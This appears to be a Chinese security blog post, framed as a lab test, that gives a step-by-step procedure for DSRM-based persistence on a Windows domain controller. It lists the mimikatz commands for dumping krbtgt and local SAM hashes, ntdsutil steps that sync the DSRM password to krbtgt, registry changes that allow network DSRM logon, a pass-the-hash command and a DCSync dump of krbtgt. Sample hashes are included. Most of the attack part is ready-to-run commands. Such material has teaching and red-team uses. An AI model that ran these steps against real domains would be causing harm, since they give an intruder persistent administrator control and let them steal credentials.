作者: r0n1n
免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。
0x00 前言
DSRM(Directory Services Restore Mode,目录服务恢复模式)是Windows域环境中域控制器的安全模式启动选项,但是只允许在控制台登陆,可以通过修改注册表的方式,来通过网络验证登陆到DC服务器上。
在每个域控制器都有一个本地管理员账户——也是DSRM账户,DSRM主要作用是使出现故障或崩溃的域环境恢复正常运行,修改DSRM密码的最基本方法是在DC上运行ntdsutil命令行工具。
此方法适用于Windows Server 2008及以上系统(2008需要安装补丁:KB961320)
0x01 本地测试
域名:god.com
域控服务器:Win-2008DC:10.10.10.30
域成员服务器:win-2008-1:10.10.10.10
1、使用mimikatz查看krbtgt账户的NTLM Hash
privilege::debug
lsadump::lsa /patch /name:krbtgt
//krbtgt hash
953eb0591ac152c17edfa514021c47f6
2、获取本地管理员的NTLM Hash
privilege::debug
token::elevate
lsadump::sam
afffeba176210fad4628f0524bfe1942
3、DSRM账号与krbtgt的NTLM Hash同步
NTDSUTIL
set dsrm password
sync from domain account krbtgt
q
q
4、查看DSRM的NTLM是否同步
lsadump::sam
5、修改DSRM登录方式
在注册表中新建:
HKLM\System\CurrentControlSet\Control\Lsa\DsrmAdminLogonBehavior 项,值为2。
DSRM的三种登录方式:(推荐设置2的原因是在我设置1的时候出现error,因为没有重启ad,但是值为2是立即生效的,在Windows Server 2000以后的版本的操作系统中,对DSRM使用控制台登录域控制器进行了限制。如果要使用DSRM账号通过网络登录域控器,需要将该值设置为2)
0:默认值,只有当域控器重启并进入DSRM模式时,才可以使用DSRM管理员账号;
1:只有当本地AD、DS服务停止时,才可以使用DSRM管理员账号登录域控制器;
2:在任何情况下都可以使用DSRM管理员账号登录域控器。
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DsrmAdminLogonBehavior /t REG_DWORD /d 2 /f
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DsrmAdminLogonBehavior /t REG_DWORD /d 0 /f
//powershell
New-ItemProperty "HKLM\System\CurrentControlSet\Control\Lsa" -name "DsrmAdminLogonBehavior" -value 2 -propertyType DWORD
6、使用DSRM账号通过网络远程登录域控器
使用mimikatz进行哈希传递,在域成员机器的管理员模式打开mimikatz(NThash为krbtgt)
privilege::debug
sekurlsa::pth /domain:WIN-2008DC /user:Administrator /ntlm:953eb0591ac152c17edfa514021c47f6
/domain:域控的主机名
/user:本机管理员用户
/NTLM:krbtgt的hash
7、使用mimikatz远程转存储krbtgt的NTLM Hash
哈希传递完成后,会弹出一个命令行窗口,并在该窗口中打开mimikatz,输入如下命令:
privilege::debug
lsadump::dcsync /domain:god.com /dc:WIN-2008DC /user:krbtgt
/dimain 域名
/dc:域控主机名
0x03 了解更多安全知识
欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
